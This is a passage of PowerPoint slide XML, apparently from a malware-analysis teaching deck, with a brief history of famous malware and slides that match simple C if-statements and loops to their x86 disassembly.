              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>1986 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>, PC-Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>earliest Trojans as a popular shareware program called “PC-Writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.”. It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>would erase all of a user’s files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1988, Morris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>infected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>a substantial percentage of computers connected to ARPANET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, bringing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>the network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>down within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>24 hours. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1991, Michelangelo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>designed to erase information from hard drives on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>March 6th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>, the birthday of the famed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Renaissance artist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Impacted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>about 10,000 systems, but the hype significantly raised public awareness of computer viruses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1999, Melissa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>first mass-emailed virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>utilized Outlook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>address books from infected machines, and mailed itself to 50 people at a time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39873442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Recognizing C/C++ structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>If statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2348880"/>
            <a:ext cx="3000821" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> x = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> y = 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>if(x == y){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>printf("x equals y.\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>("x is not equal to y.\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779912" y="1794882"/>
            <a:ext cx="5256584" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401006 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_8], 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040100D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_4], 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401014 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_4] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>jnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>	short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>loc_40102B </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101C push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>aXEqualsY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>_ ; "x equals y.\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401021 call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401026 add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401029 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>loc_401038 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040102B loc_40102B:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040102B push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>aXIsNotEqualToY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> ; "x is not equal to y.\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401030 call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7993893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29" y="3054222"/>
            <a:ext cx="3834706" cy="3678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Recognizing C/C++ structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Loop</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620888" y="1700808"/>
            <a:ext cx="2529347" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&lt;100; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>printf("i equals %d\n", i);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4426003" y="1207539"/>
            <a:ext cx="4610493" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401004 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_4], 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040100B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>loc_401016 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040100D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>loc_40100D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040100D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_4] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401010 add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401013 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_4], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>loc_401016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_4], 64h </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>loc_40102F </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_4]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>push	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401020 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>push	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>aID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> ; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> equals %d\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401025 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>call	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040102A add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040102D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	short loc_40100D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0040102F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>loc_40102F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>00401034 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
